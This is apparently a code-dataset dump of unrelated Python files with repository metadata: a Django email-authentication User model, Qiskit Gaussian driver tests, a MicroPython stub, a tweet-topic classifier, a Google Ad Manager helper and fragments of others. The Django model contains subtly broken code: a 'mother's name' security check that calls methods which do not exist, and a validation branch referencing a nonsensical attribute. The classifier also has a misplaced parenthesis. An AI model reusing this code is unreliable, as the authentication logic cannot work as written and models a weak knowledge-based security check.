node_type='process.calculation.calcjob.CalcJobNode.',
user_id=self.default_user.id,
extras={
'something': 123,
'_aiida_hash': 'abcd'
}
)
self.node.save()
def test_data_migrated(self):
node = self.load_node(self.node.id)
extras = node.extras
self.assertEqual(extras.get('something'), 123) # Other extras should be untouched
self.assertNotIn('_aiida_hash', extras) # The hash extra should have been removed
| true
| true
|
1c4478138375cda3bf6bd2ae41a6f112bb318389
| 3,278
|
py
|
Python
|
email_auth/models.py
|
vaibhavantil2/django-shop
|
10d82a0ae9096f501b90ad9fd585a378c789ee51
|
[
"BSD-3-Clause"
] | null | null | null |
email_auth/models.py
|
vaibhavantil2/django-shop
|
10d82a0ae9096f501b90ad9fd585a378c789ee51
|
[
"BSD-3-Clause"
] | null | null | null |
email_auth/models.py
|
vaibhavantil2/django-shop
|
10d82a0ae9096f501b90ad9fd585a378c789ee51
|
[
"BSD-3-Clause"
] | 3
|
2021-11-16T12:28:49.000Z
|
2021-12-22T06:55:30.000Z
|
"""
Alternative implementation of Django's authentication User model, which allows to authenticate
against the email field in addition to the username fields.
This alternative implementation is activated by setting ``AUTH_USER_MODEL = 'shop.User'`` in
settings.py, otherwise the default Django or another customized implementation will be used.
"""
from django.contrib.auth import get_user_model
from django.contrib.auth.models import AbstractUser, UserManager as BaseUserManager
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext_lazy as _
class UserManager(BaseUserManager):
def get_by_natural_key(self, username):
try:
return self.get(username=username)
except self.model.DoesNotExist:
return self.get(is_active=True, email=username)
class User(AbstractUser):
"""
Alternative implementation of Django's User model allowing to authenticate against the email
field in addition to the username field, which remains the primary unique identifier. The
email field is only used in addition. For users marked as active, their email address must
be unique. Guests can reuse their email address as often they want.
"""
objects = UserManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['username']
class Meta:
db_table = 'auth_user'
verbose_name = _("Customer")
verbose_name_plural = _("Customers")
swappable = 'AUTH_USER_MODEL'
def get_username(self):
return self.email
def __str__(self):
if self.is_staff or self.is_superuser:
return self.username
return self.email or '<anonymous>'
def get_full_name(self):
full_name = super(User, self).get_full_name()
if full_name:
return full_name
return self.get_short_name()
def get_short_name(self):
short_name = super(User, self).get_short_name()
if short_name:
return short_name
return self.email
def get_security_check(self):
mother_name = super(User, self).get_mothers_name()
if mother_name:
return mother_name
return self.mother
def validate_unique(self, exclude=None):
"""
Since the email address is used as the primary identifier, we must ensure that it is
unique. However, since this constraint only applies to active users, it can't be done
through a field declaration via a database UNIQUE index.
Inactive users can't login anyway, so we don't need a unique constraint for them.
"""
super(User, self).validate_unique(exclude)
if self.email and get_user_model().objects.exclude(id=self.id).filter(is_active=True,
email__exact=self.email).exists():
if self.mother_name != UserManager.User.Mother_Name:
msg = _("A customer with the e-mail address ‘{email}’ is not authrized.")
raise ValidationError({'email': msg.format(email=self.email)})
msg = _("A customer with the e-mail address ‘{email}’ is not verified.")
raise ValidationError({'email': msg.format(email=self.email)})
| 40.469136
| 112
| 0.672971
|
from django.contrib.auth import get_user_model
from django.contrib.auth.models import AbstractUser, UserManager as BaseUserManager
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext_lazy as _
class UserManager(BaseUserManager):
def get_by_natural_key(self, username):
try:
return self.get(username=username)
except self.model.DoesNotExist:
return self.get(is_active=True, email=username)
class User(AbstractUser):
objects = UserManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['username']
class Meta:
db_table = 'auth_user'
verbose_name = _("Customer")
verbose_name_plural = _("Customers")
swappable = 'AUTH_USER_MODEL'
def get_username(self):
return self.email
def __str__(self):
if self.is_staff or self.is_superuser:
return self.username
return self.email or '<anonymous>'
def get_full_name(self):
full_name = super(User, self).get_full_name()
if full_name:
return full_name
return self.get_short_name()
def get_short_name(self):
short_name = super(User, self).get_short_name()
if short_name:
return short_name
return self.email
def get_security_check(self):
mother_name = super(User, self).get_mothers_name()
if mother_name:
return mother_name
return self.mother
def validate_unique(self, exclude=None):
super(User, self).validate_unique(exclude)
if self.email and get_user_model().objects.exclude(id=self.id).filter(is_active=True,
email__exact=self.email).exists():
if self.mother_name != UserManager.User.Mother_Name:
msg = _("A customer with the e-mail address ‘{email}’ is not authrized.")
raise ValidationError({'email': msg.format(email=self.email)})
msg = _("A customer with the e-mail address ‘{email}’ is not verified.")
raise ValidationError({'email': msg.format(email=self.email)})
| true
| true
|
1c4478cf27279c1b3b6d9d53a0f12f63325505c6
| 711
|
py
|
Python
|
stubs/micropython-v1_12-esp32/urandom.py
|
mattytrentini/micropython-stubs
|
4d596273823b69e9e5bcf5fa67f249c374ee0bbc
|
[
"MIT"
] | null | null | null |
stubs/micropython-v1_12-esp32/urandom.py
|
mattytrentini/micropython-stubs
|
4d596273823b69e9e5bcf5fa67f249c374ee0bbc
|
[
"MIT"
] | null | null | null |
stubs/micropython-v1_12-esp32/urandom.py
|
mattytrentini/micropython-stubs
|
4d596273823b69e9e5bcf5fa67f249c374ee0bbc
|
[
"MIT"
] | null | null | null |
"""
Module: 'urandom' on micropython-v1.12-esp32
"""
# MCU: {'ver': 'v1.12', 'port': 'esp32', 'arch': 'xtensawin', 'sysname': 'esp32', 'release': '1.12.0', 'name': 'micropython', 'mpy': 10757, 'version': '1.12.0', 'machine': 'ESP32 module (spiram) with ESP32', 'build': '', 'nodename': 'esp32', 'platform': 'esp32', 'family': 'micropython'}
# Stubber: 1.5.4
from typing import Any
def choice(*args, **kwargs) -> Any:
...
def getrandbits(*args, **kwargs) -> Any:
...
def randint(*args, **kwargs) -> Any:
...
def random(*args, **kwargs) -> Any:
...
def randrange(*args, **kwargs) -> Any:
...
def seed(*args, **kwargs) -> Any:
...
def uniform(*args, **kwargs) -> Any:
...
| 20.314286
| 287
| 0.556962
|
from typing import Any
def choice(*args, **kwargs) -> Any:
...
def getrandbits(*args, **kwargs) -> Any:
...
def randint(*args, **kwargs) -> Any:
...
def random(*args, **kwargs) -> Any:
...
def randrange(*args, **kwargs) -> Any:
...
def seed(*args, **kwargs) -> Any:
...
def uniform(*args, **kwargs) -> Any:
...
| true
| true
|
1c4478e8f37c4dcc3ce6658c1bbadfe574f5833e
| 597
|
py
|
Python
|
Ch_7_Mangle Data Like a Pro/demo_of_re_findall.py
|
brianchiang-tw/Introducing_Python
|
557fcddb6329741a177d6ee1d24122b36e106235
|
[
"MIT"
] | 1
|
2020-07-21T08:34:08.000Z
|
2020-07-21T08:34:08.000Z
|
Ch_7_Mangle Data Like a Pro/demo_of_re_findall.py
|
brianchiang-tw/Introducing_Python
|
557fcddb6329741a177d6ee1d24122b36e106235
|
[
"MIT"
] | null | null | null |
Ch_7_Mangle Data Like a Pro/demo_of_re_findall.py
|
brianchiang-tw/Introducing_Python
|
557fcddb6329741a177d6ee1d24122b36e106235
|
[
"MIT"
] | null | null | null |
import re
source = 'Young Frankenstein'
m = re.findall('n', source)
if m:
# Found 4 matches
# ['n', 'n', 'n', 'n']
print(f'Found {len(m)} matches')
print( m )
# ---------------------------------
source = 'Young Frankenstein'
m = re.findall('n.', source)
if m:
# Found 3 matches
# ['ng', 'nk', 'ns']
print(f'Found {len(m)} matches')
print( m )
# ----------------------------------
source = 'Young Frankenstein'
m = re.findall('n.?', source)
if m:
# Found 4 matches
# ['ng', 'nk', 'ns', 'n']
print(f'Found {len(m)} matches')
print( m )
| 18.65625
| 36
| 0.463987
|
import re
source = 'Young Frankenstein'
m = re.findall('n', source)
if m:
print(f'Found {len(m)} matches')
print( m )
source = 'Young Frankenstein'
m = re.findall('n.', source)
if m:
print(f'Found {len(m)} matches')
print( m )
source = 'Young Frankenstein'
m = re.findall('n.?', source)
if m:
print(f'Found {len(m)} matches')
print( m )
| true
| true
|
1c4479a1081509e9c8cd3fe5ea7ce84bc8532189
| 6,919
|
py
|
Python
|
test/drivers/gaussiand/test_driver_gaussian_log.py
|
divshacker/qiskit-nature
|
08f6dcec5e4ac8c08f5b84e764ee78cc3d12facb
|
[
"Apache-2.0"
] | 1
|
2021-06-20T15:31:01.000Z
|
2021-06-20T15:31:01.000Z
|
test/drivers/gaussiand/test_driver_gaussian_log.py
|
divshacker/qiskit-nature
|
08f6dcec5e4ac8c08f5b84e764ee78cc3d12facb
|
[
"Apache-2.0"
] | 1
|
2021-08-25T13:31:41.000Z
|
2021-08-25T13:31:41.000Z
|
test/drivers/gaussiand/test_driver_gaussian_log.py
|
divshacker/qiskit-nature
|
08f6dcec5e4ac8c08f5b84e764ee78cc3d12facb
|
[
"Apache-2.0"
] | 3
|
2021-07-02T06:57:58.000Z
|
2021-07-06T12:32:38.000Z
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2020, 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Test Gaussian Log Driver """
import unittest
from test import QiskitNatureTestCase
from qiskit_nature.drivers import GaussianLogDriver, GaussianLogResult
from qiskit_nature import QiskitNatureError
class TestDriverGaussianLog(QiskitNatureTestCase):
"""Gaussian Log Driver tests."""
def setUp(self):
super().setUp()
self.logfile = self.get_resource_path(
"test_driver_gaussian_log.txt", "drivers/second_quantization/gaussiand"
)
def test_log_driver(self):
"""Test the driver itself creates log and we can get a result"""
try:
driver = GaussianLogDriver(
[
"#p B3LYP/6-31g Freq=(Anharm) Int=Ultrafine SCF=VeryTight",
"",
"CO2 geometry optimization B3LYP/cc-pVTZ",
"",
"0 1",
"C -0.848629 2.067624 0.160992",
"O 0.098816 2.655801 -0.159738",
"O -1.796073 1.479446 0.481721",
"",
"",
]
)
result = driver.run()
qfc = result.quadratic_force_constants
expected = [
("1", "1", 1409.20235, 1.17003, 0.07515),
("2", "2", 2526.46159, 3.76076, 0.24156),
("3a", "3a", 462.61566, 0.12609, 0.0081),
("3b", "3b", 462.61566, 0.12609, 0.0081),
]
self.assertListEqual(qfc, expected)
except QiskitNatureError:
self.skipTest("GAUSSIAN driver does not appear to be installed")
# These tests check the gaussian log result and the parsing from a partial log file that is
# located with the tests so that this aspect of the code can be tested independent of
# Gaussian 16 being installed.
def test_gaussian_log_result_file(self):
"""Test result from file"""
result = GaussianLogResult(self.logfile)
with open(self.logfile) as file:
lines = file.read().split("\n")
with self.subTest("Check list of lines"):
self.assertListEqual(result.log, lines)
with self.subTest("Check as string"):
line = "\n".join(lines)
self.assertEqual(str(result), line)
def test_gaussian_log_result_list(self):
"""Test result from list of strings"""
with open(self.logfile) as file:
lines = file.read().split("\n")
result = GaussianLogResult(lines)
self.assertListEqual(result.log, lines)
def test_gaussian_log_result_string(self):
"""Test result from string"""
with open(self.logfile) as file:
line = file.read()
result = GaussianLogResult(line)
self.assertListEqual(result.log, line.split("\n"))
def test_quadratic_force_constants(self):
"""Test quadratic force constants"""
result = GaussianLogResult(self.logfile)
qfc = result.quadratic_force_constants
expected = [
("1", "1", 1409.20235, 1.17003, 0.07515),
("2", "2", 2526.46159, 3.76076, 0.24156),
("3a", "3a", 462.61566, 0.12609, 0.0081),
("3b", "3b", 462.61566, 0.12609, 0.0081),
]
self.assertListEqual(qfc, expected)
def test_cubic_force_constants(self):
"""Test cubic force constants"""
result = GaussianLogResult(self.logfile)
cfc = result.cubic_force_constants
expected = [
("1", "1", "1", -260.36071, -1.39757, -0.0475),
("2", "2", "1", -498.9444, -4.80163, -0.1632),
("3a", "3a", "1", 239.87769, 0.4227, 0.01437),
("3a", "3b", "1", 74.25095, 0.13084, 0.00445),
("3b", "3b", "1", 12.93985, 0.0228, 0.00078),
]
self.assertListEqual(cfc, expected)
def test_quartic_force_constants(self):
"""Test quartic force constants"""
result = GaussianLogResult(self.logfile)
qfc = result.quartic_force_constants
expected = [
("1", "1", "1", "1", 40.39063, 1.40169, 0.02521),
("2", "2", "1", "1", 79.08068, 4.92017, 0.0885),
("2", "2", "2", "2", 154.78015, 17.26491, 0.31053),
("3a", "3a", "1", "1", -67.10879, -0.76453, -0.01375),
("3b", "3b", "1", "1", -67.10879, -0.76453, -0.01375),
("3a", "3a", "2", "2", -163.29426, -3.33524, -0.05999),
("3b", "3b", "2", "2", -163.29426, -3.33524, -0.05999),
("3a", "3a", "3a", "3a", 220.54851, 0.82484, 0.01484),
("3a", "3a", "3a", "3b", 66.77089, 0.24972, 0.00449),
("3a", "3a", "3b", "3b", 117.26759, 0.43857, 0.00789),
("3a", "3b", "3b", "3b", -66.77088, -0.24972, -0.00449),
("3b", "3b", "3b", "3b", 220.54851, 0.82484, 0.01484),
]
self.assertListEqual(qfc, expected)
def test_watson_hamiltonian(self):
"""Test the watson hamiltonian"""
result = GaussianLogResult(self.logfile)
watson = result.get_watson_hamiltonian()
expected = [
[352.3005875, 2, 2],
[-352.3005875, -2, -2],
[631.6153975, 1, 1],
[-631.6153975, -1, -1],
[115.653915, 4, 4],
[-115.653915, -4, -4],
[115.653915, 3, 3],
[-115.653915, -3, -3],
[-15.341901966295344, 2, 2, 2],
[-88.2017421687633, 1, 1, 2],
[42.40478531359112, 4, 4, 2],
[26.25167512727164, 4, 3, 2],
[2.2874639206341865, 3, 3, 2],
[0.4207357291666667, 2, 2, 2, 2],
[4.9425425, 1, 1, 2, 2],
[1.6122932291666665, 1, 1, 1, 1],
[-4.194299375, 4, 4, 2, 2],
[-4.194299375, 3, 3, 2, 2],
[-10.20589125, 4, 4, 1, 1],
[-10.20589125, 3, 3, 1, 1],
[2.2973803125, 4, 4, 4, 4],
[2.7821204166666664, 4, 4, 4, 3],
[7.329224375, 4, 4, 3, 3],
[-2.7821200000000004, 4, 3, 3, 3],
[2.2973803125, 3, 3, 3, 3],
]
for i, entry in enumerate(watson.data):
msg = "mode[{}]={} does not match expected {}".format(i, entry, expected[i])
self.assertAlmostEqual(entry[0], expected[i][0], msg=msg)
self.assertListEqual(entry[1:], expected[i][1:], msg=msg)
if __name__ == "__main__":
unittest.main()
| 39.3125
| 95
| 0.533459
|
import unittest
from test import QiskitNatureTestCase
from qiskit_nature.drivers import GaussianLogDriver, GaussianLogResult
from qiskit_nature import QiskitNatureError
class TestDriverGaussianLog(QiskitNatureTestCase):
def setUp(self):
super().setUp()
self.logfile = self.get_resource_path(
"test_driver_gaussian_log.txt", "drivers/second_quantization/gaussiand"
)
def test_log_driver(self):
try:
driver = GaussianLogDriver(
[
"#p B3LYP/6-31g Freq=(Anharm) Int=Ultrafine SCF=VeryTight",
"",
"CO2 geometry optimization B3LYP/cc-pVTZ",
"",
"0 1",
"C -0.848629 2.067624 0.160992",
"O 0.098816 2.655801 -0.159738",
"O -1.796073 1.479446 0.481721",
"",
"",
]
)
result = driver.run()
qfc = result.quadratic_force_constants
expected = [
("1", "1", 1409.20235, 1.17003, 0.07515),
("2", "2", 2526.46159, 3.76076, 0.24156),
("3a", "3a", 462.61566, 0.12609, 0.0081),
("3b", "3b", 462.61566, 0.12609, 0.0081),
]
self.assertListEqual(qfc, expected)
except QiskitNatureError:
self.skipTest("GAUSSIAN driver does not appear to be installed")
def test_gaussian_log_result_file(self):
result = GaussianLogResult(self.logfile)
with open(self.logfile) as file:
lines = file.read().split("\n")
with self.subTest("Check list of lines"):
self.assertListEqual(result.log, lines)
with self.subTest("Check as string"):
line = "\n".join(lines)
self.assertEqual(str(result), line)
def test_gaussian_log_result_list(self):
with open(self.logfile) as file:
lines = file.read().split("\n")
result = GaussianLogResult(lines)
self.assertListEqual(result.log, lines)
def test_gaussian_log_result_string(self):
with open(self.logfile) as file:
line = file.read()
result = GaussianLogResult(line)
self.assertListEqual(result.log, line.split("\n"))
def test_quadratic_force_constants(self):
result = GaussianLogResult(self.logfile)
qfc = result.quadratic_force_constants
expected = [
("1", "1", 1409.20235, 1.17003, 0.07515),
("2", "2", 2526.46159, 3.76076, 0.24156),
("3a", "3a", 462.61566, 0.12609, 0.0081),
("3b", "3b", 462.61566, 0.12609, 0.0081),
]
self.assertListEqual(qfc, expected)
def test_cubic_force_constants(self):
result = GaussianLogResult(self.logfile)
cfc = result.cubic_force_constants
expected = [
("1", "1", "1", -260.36071, -1.39757, -0.0475),
("2", "2", "1", -498.9444, -4.80163, -0.1632),
("3a", "3a", "1", 239.87769, 0.4227, 0.01437),
("3a", "3b", "1", 74.25095, 0.13084, 0.00445),
("3b", "3b", "1", 12.93985, 0.0228, 0.00078),
]
self.assertListEqual(cfc, expected)
def test_quartic_force_constants(self):
result = GaussianLogResult(self.logfile)
qfc = result.quartic_force_constants
expected = [
("1", "1", "1", "1", 40.39063, 1.40169, 0.02521),
("2", "2", "1", "1", 79.08068, 4.92017, 0.0885),
("2", "2", "2", "2", 154.78015, 17.26491, 0.31053),
("3a", "3a", "1", "1", -67.10879, -0.76453, -0.01375),
("3b", "3b", "1", "1", -67.10879, -0.76453, -0.01375),
("3a", "3a", "2", "2", -163.29426, -3.33524, -0.05999),
("3b", "3b", "2", "2", -163.29426, -3.33524, -0.05999),
("3a", "3a", "3a", "3a", 220.54851, 0.82484, 0.01484),
("3a", "3a", "3a", "3b", 66.77089, 0.24972, 0.00449),
("3a", "3a", "3b", "3b", 117.26759, 0.43857, 0.00789),
("3a", "3b", "3b", "3b", -66.77088, -0.24972, -0.00449),
("3b", "3b", "3b", "3b", 220.54851, 0.82484, 0.01484),
]
self.assertListEqual(qfc, expected)
def test_watson_hamiltonian(self):
result = GaussianLogResult(self.logfile)
watson = result.get_watson_hamiltonian()
expected = [
[352.3005875, 2, 2],
[-352.3005875, -2, -2],
[631.6153975, 1, 1],
[-631.6153975, -1, -1],
[115.653915, 4, 4],
[-115.653915, -4, -4],
[115.653915, 3, 3],
[-115.653915, -3, -3],
[-15.341901966295344, 2, 2, 2],
[-88.2017421687633, 1, 1, 2],
[42.40478531359112, 4, 4, 2],
[26.25167512727164, 4, 3, 2],
[2.2874639206341865, 3, 3, 2],
[0.4207357291666667, 2, 2, 2, 2],
[4.9425425, 1, 1, 2, 2],
[1.6122932291666665, 1, 1, 1, 1],
[-4.194299375, 4, 4, 2, 2],
[-4.194299375, 3, 3, 2, 2],
[-10.20589125, 4, 4, 1, 1],
[-10.20589125, 3, 3, 1, 1],
[2.2973803125, 4, 4, 4, 4],
[2.7821204166666664, 4, 4, 4, 3],
[7.329224375, 4, 4, 3, 3],
[-2.7821200000000004, 4, 3, 3, 3],
[2.2973803125, 3, 3, 3, 3],
]
for i, entry in enumerate(watson.data):
msg = "mode[{}]={} does not match expected {}".format(i, entry, expected[i])
self.assertAlmostEqual(entry[0], expected[i][0], msg=msg)
self.assertListEqual(entry[1:], expected[i][1:], msg=msg)
if __name__ == "__main__":
unittest.main()
| true
| true
|
1c447a30344894966ddbd67d7e8299c130481086
| 391
|
py
|
Python
|
mediaman/services/drive/experiments/serviceaccounttest.py
|
MattCCS/MediaMan
|
388c0d16da437b0ede4f0903a01e41dc8e927ae6
|
[
"BSD-3-Clause-Clear"
] | 1
|
2019-05-06T19:51:08.000Z
|
2019-05-06T19:51:08.000Z
|
mediaman/services/drive/experiments/serviceaccounttest.py
|
MattCCS/MediaMan
|
388c0d16da437b0ede4f0903a01e41dc8e927ae6
|
[
"BSD-3-Clause-Clear"
] | 1
|
2021-02-08T20:22:34.000Z
|
2021-02-08T20:22:34.000Z
|
mediaman/services/drive/experiments/serviceaccounttest.py
|
MattCCS/MediaMan
|
388c0d16da437b0ede4f0903a01e41dc8e927ae6
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
# service account basic example
import googleapiclient
from apiclient.discovery import build
drive = build("drive", "v3")
drive.files().list().execute()
file_metadata = {'name': 'test.txt'}
media = googleapiclient.http.MediaFileUpload("test.txt")
file_receipt = drive.files().create(body=file_metadata, media_body=media, fields="id").execute()
file_receipt
drive.files().list().execute()
| 27.928571
| 96
| 0.757033
|
import googleapiclient
from apiclient.discovery import build
drive = build("drive", "v3")
drive.files().list().execute()
file_metadata = {'name': 'test.txt'}
media = googleapiclient.http.MediaFileUpload("test.txt")
file_receipt = drive.files().create(body=file_metadata, media_body=media, fields="id").execute()
file_receipt
drive.files().list().execute()
| true
| true
|
1c447aa8d452648be1850d869567b6b283f8f840
| 681
|
py
|
Python
|
tests_integration/helpers/archive_order_by_name.py
|
kmjennison/dfp-prebid-setup
|
d965f9a70e56a8444ecd80566028f09964b51d04
|
[
"MIT"
] | 111
|
2017-03-09T02:05:25.000Z
|
2022-03-14T21:03:00.000Z
|
tests_integration/helpers/archive_order_by_name.py
|
kmjennison/dfp-prebid-setup
|
d965f9a70e56a8444ecd80566028f09964b51d04
|
[
"MIT"
] | 81
|
2017-03-10T08:07:02.000Z
|
2022-03-02T04:44:06.000Z
|
tests_integration/helpers/archive_order_by_name.py
|
kmjennison/dfp-prebid-setup
|
d965f9a70e56a8444ecd80566028f09964b51d04
|
[
"MIT"
] | 87
|
2017-03-16T21:38:53.000Z
|
2022-02-04T11:48:29.000Z
|
#!/usr/bin/env python
import logging
from googleads import ad_manager
from dfp.client import get_client
# from tests_integration.helpers.get_order_by_name import get_order_by_name
def archive_order_by_name(order_name):
"""
Archives an order by name in DFP.
Args:
order_name (str): the name of the DFP order to archive
Returns:
None
"""
client = get_client()
order_service = client.GetService('OrderService', version='v202108')
statement = (ad_manager.StatementBuilder()
.Where('name = :name')
.WithBindVariable('name', order_name))
response = order_service.performOrderAction(
{'xsi_type': 'ArchiveOrders'},
statement.ToStatement())
| 24.321429
| 75
| 0.734214
|
import logging
from googleads import ad_manager
from dfp.client import get_client
def archive_order_by_name(order_name):
client = get_client()
order_service = client.GetService('OrderService', version='v202108')
statement = (ad_manager.StatementBuilder()
.Where('name = :name')
.WithBindVariable('name', order_name))
response = order_service.performOrderAction(
{'xsi_type': 'ArchiveOrders'},
statement.ToStatement())
| true
| true
|
1c447be720a241ddbbc7be776decca7269ad922b
| 3,708
|
py
|
Python
|
scripts/classifier.py
|
michaelhalim168/GiftFinder
|
7fda99be827a06e5ef2d112174ded93ad1d3b7b1
|
[
"MIT"
] | null | null | null |
scripts/classifier.py
|
michaelhalim168/GiftFinder
|
7fda99be827a06e5ef2d112174ded93ad1d3b7b1
|
[
"MIT"
] | null | null | null |
scripts/classifier.py
|
michaelhalim168/GiftFinder
|
7fda99be827a06e5ef2d112174ded93ad1d3b7b1
|
[
"MIT"
] | 1
|
2021-08-02T07:49:01.000Z
|
2021-08-02T07:49:01.000Z
|
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn.multiclass import OneVsRestClassifier
from sklearn.svm import LinearSVC
from sklearn.preprocessing import LabelEncoder
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
from data_cleaning import *
class OVR_SVC:
def __init__(self, data):
self.X = data['clean-text']
self.y = data['category']
le = LabelEncoder()
self.y = le.fit_transform(self.y)
self.reference = dict(zip(data['category'].to_numpy()), y)
self.reference = {k:v for k,v in sorted(self.reference.items(), key=lambda item: item[1])}
self.model = OneVsRestClassifier(LinearSVC(random_state=0))
self.x_train, self.x_test, self.y_train, self.y_test = train_test_split(self.X, self.y, test_size=0.3)
def vectorizer(self, type='tfidf'):
if type == 'tfidf':
vectorizer = TfidfVectorizer()
elif type == 'count':
vectorizer = CountVectorizer()
self.x_train = vectorizer.fit_transform(self.x_train)
self.x_test = vectorizer.transform(self.x_test)
def train_model(self):
self.model.fit(self.x_train, self.y_train)
def evaluate_model(self):
y_predicted = self.model.predict(self.x_test)
accuracy = self.model.score(self.x_test, self.y_test)
return y_predicted, accuracy
class TweetCategory:
def __init__(self, model, vectorizer, tweet_data, reference):
self.data = tweet_data
self.model = model
self.vectorizer = vectorizer
self.ref = reference
self.analyzer = SentimentIntensityAnalyzer()
def process_user_tweets(self):
self.data['clean-tweet'] = self.data['Tweet Content'].map(tweet_preprocess)
self.data = self.data[['Tweet Content', 'clean-tweet']].rename(columns={'Tweet Content': 'tweet'})
self.data['vader-sentiment'] = self.data['tweet'].apply(lambda x: self.analyzer.polarity_scores(x))
self.data['vader-pos'] = self.data['vader-sentiment'].apply(lambda x: x['pos'])
self.data['vader-neu'] = self.data['vader-sentiment'].apply(lambda x: x['neu'])
self.data['vader-neg'] = self.data['vader-sentiment'].apply(lambda x: x['neg'])
self.data['vader-compound'] = self.data['vader-sentiment'].apply(lambda x: x['compound'])
def predict_topics(self, sentiment_thresh, confidence_thresh):
self.predict_df = self.data[(self.data['vader-compound'] >= sentiment_thresh) & (self.data['clean-tweet'] != '')]
tweets_transformed = self.vectorizer.transform(self.predict_df['clean-tweet'])
predicted_category = self.model.predict(tweets_transformed)
p = np.array(self.model.decision_function(tweets_transformed))
probability = np.exp(p)/np.sum(np.exp(p), axis=1, keepdims=True)
probability_list = [max(prob) for prob in probability]
self.predict_df['predicted_label'] = predicted_category
self.predict_df['probability'] = probability_list
self.predict_df['predicted'] = self.predict_df['predicted_label'].apply(lambda x: self.ref[x])
top_categories = self.predict_df[self.predict_df['probability'] >= confidence_thresh]['predicted'].value_counts()[:3]
return top_categories
def user_tweet_df(tweets):
all_tweets = []
username = tweets[0]._json['user']['screen_name']
for tweet in tweets:
all_tweets.append(tweet._json['full_text'])
df = pd.DataFrame({'user': username, 'Tweet Content': all_tweets})
return df
| 41.2
| 132
| 0.677994
|
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn.multiclass import OneVsRestClassifier
from sklearn.svm import LinearSVC
from sklearn.preprocessing import LabelEncoder
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
from data_cleaning import *
class OVR_SVC:
def __init__(self, data):
self.X = data['clean-text']
self.y = data['category']
le = LabelEncoder()
self.y = le.fit_transform(self.y)
self.reference = dict(zip(data['category'].to_numpy()), y)
self.reference = {k:v for k,v in sorted(self.reference.items(), key=lambda item: item[1])}
self.model = OneVsRestClassifier(LinearSVC(random_state=0))
self.x_train, self.x_test, self.y_train, self.y_test = train_test_split(self.X, self.y, test_size=0.3)
def vectorizer(self, type='tfidf'):
if type == 'tfidf':
vectorizer = TfidfVectorizer()
elif type == 'count':
vectorizer = CountVectorizer()
self.x_train = vectorizer.fit_transform(self.x_train)
self.x_test = vectorizer.transform(self.x_test)
def train_model(self):
self.model.fit(self.x_train, self.y_train)
def evaluate_model(self):
y_predicted = self.model.predict(self.x_test)
accuracy = self.model.score(self.x_test, self.y_test)
return y_predicted, accuracy
class TweetCategory:
def __init__(self, model, vectorizer, tweet_data, reference):
self.data = tweet_data
self.model = model
self.vectorizer = vectorizer
self.ref = reference
self.analyzer = SentimentIntensityAnalyzer()
def process_user_tweets(self):
self.data['clean-tweet'] = self.data['Tweet Content'].map(tweet_preprocess)
self.data = self.data[['Tweet Content', 'clean-tweet']].rename(columns={'Tweet Content': 'tweet'})
self.data['vader-sentiment'] = self.data['tweet'].apply(lambda x: self.analyzer.polarity_scores(x))
self.data['vader-pos'] = self.data['vader-sentiment'].apply(lambda x: x['pos'])
self.data['vader-neu'] = self.data['vader-sentiment'].apply(lambda x: x['neu'])
self.data['vader-neg'] = self.data['vader-sentiment'].apply(lambda x: x['neg'])
self.data['vader-compound'] = self.data['vader-sentiment'].apply(lambda x: x['compound'])
def predict_topics(self, sentiment_thresh, confidence_thresh):
self.predict_df = self.data[(self.data['vader-compound'] >= sentiment_thresh) & (self.data['clean-tweet'] != '')]
tweets_transformed = self.vectorizer.transform(self.predict_df['clean-tweet'])
predicted_category = self.model.predict(tweets_transformed)
p = np.array(self.model.decision_function(tweets_transformed))
probability = np.exp(p)/np.sum(np.exp(p), axis=1, keepdims=True)
probability_list = [max(prob) for prob in probability]
self.predict_df['predicted_label'] = predicted_category
self.predict_df['probability'] = probability_list
self.predict_df['predicted'] = self.predict_df['predicted_label'].apply(lambda x: self.ref[x])
top_categories = self.predict_df[self.predict_df['probability'] >= confidence_thresh]['predicted'].value_counts()[:3]
return top_categories
def user_tweet_df(tweets):
all_tweets = []
username = tweets[0]._json['user']['screen_name']
for tweet in tweets:
all_tweets.append(tweet._json['full_text'])
df = pd.DataFrame({'user': username, 'Tweet Content': all_tweets})
return df
| true
| true
|
1c447ccae06de96876bb5c45dbe5c87ce36a611e
| 11,319
|
py
|
Python
|
RPLCD/i2c.py
|
sphh/RPLCD
|
c4dc451623da5e02292046388be5201cbc25321e
|
[
"MIT"
] | 2
|
2020-09-06T17:05:06.000Z
|
2021-03-04T14:41:37.000Z
|
RPLCD/i2c.py
|
sphh/RPLCD
|
c4dc451623da5e02292046388be5201cbc25321e
|
[
"MIT"
] | 6
|
2018-03-13T18:41:29.000Z
|
2020-08-29T11:41:52.000Z
|
RPLCD/i2c.py
|
sphh/RPLCD
|
c4dc451623da5e02292046388be5201cbc25321e
|
[
"MIT"
] | 2
|
2020-08-05T04:01:34.000Z
|
2020-08-09T15:12:23.000Z
|
# -*- coding: utf-8 -*-
"""
Copyright (C) 2013-2017 Danilo Bargen
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
